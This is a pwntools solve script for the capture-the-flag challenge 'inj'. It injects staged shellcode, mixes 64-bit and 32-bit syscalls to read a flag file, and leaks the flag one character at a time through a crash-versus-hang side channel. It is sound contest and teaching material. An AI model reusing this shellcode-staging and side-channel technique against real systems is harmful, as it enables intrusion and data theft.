from pwn import *
elf = ELF('./inj')

context.binary = elf
context.log_level = "error"

part1 = asm("""
add eax, 10
mov edi, 0x400000
mov esi, 0x1000
mov edx, 7
syscall
mov eax, 3
mov ecx, edi
mov edx, esi
xor ebx, ebx
int 0x80
jmp rdi
""")

possible_chars = [
    "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
    "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
    "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
    "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
    "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z",
    "!", "_", "}"
]

# Flag format is TFCCTF{}
index = 7
flag = "TFCCTF{"
char = '2'

for i in range(0, 100):
    for j in range(0, len(possible_chars)):
        p = elf.process()
        p.readuntil(b'executor!')
        p.send(part1)

        try:
            part2 = asm(f"""
            mov rax, 8392585648256674918
            mov rbx, 0x400800
            mov [rbx], rax
            mov rax, 5
            xor rcx, rcx
            xor rdx, rdx
            int 0x80
            mov ebx, eax
            mov ecx, 0x404600
            mov edx, 120
            int 0x80
            add rcx, {index}
            mov al, byte ptr [rcx]
            mov bl, {ord(possible_chars[j])}
            cmp al, bl
            jne .segfault
            mov eax, 3
            xor rbx, rbx
            int 0x80

            .segfault:
                xor rax, rax
                mov al, byte ptr [rax]
                hlt
            """)

            p.send(part2)
            response = p.recv(timeout=0.1)
            if response:
                print(1)
            else:
                flag += possible_chars[j]
                break

        except EOFError:
            continue
        except TimeoutError:
            print(4)
        finally:
            p.kill()
    index += 1
    print(flag)

    if (flag[-1] == '}'):
        break

p.interactive()
